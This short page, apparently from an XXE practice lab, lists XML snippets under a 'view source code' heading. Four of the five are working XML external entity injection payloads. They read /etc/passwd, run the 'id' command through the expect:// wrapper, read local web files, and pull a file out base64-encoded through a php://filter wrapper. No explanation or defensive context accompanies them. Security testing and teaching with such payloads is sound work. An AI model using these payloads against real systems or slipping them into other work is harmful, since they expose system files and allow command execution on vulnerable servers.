查看源代码
<?xml version="1.0" encoding="utf-8"?> <name> kuaishouduhailaonainren </name>
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE creds[ <!ENTITY goodies SYSTEM "file:///etc/passwd">]> <creds> &goodies; </creds>
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE creds[ <!ENTITY goodies SYSTEM "expect://id">]> <creds> &goodies; </creds>
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE creds[ <!ENTITY goodies SYSTEM "file:///var/www/html/xxe/1.txt">]> <creds> &goodies; </creds>
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE creds[ <!ENTITY goodies SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/xxe/2.txt">]> <creds> &goodies; </creds>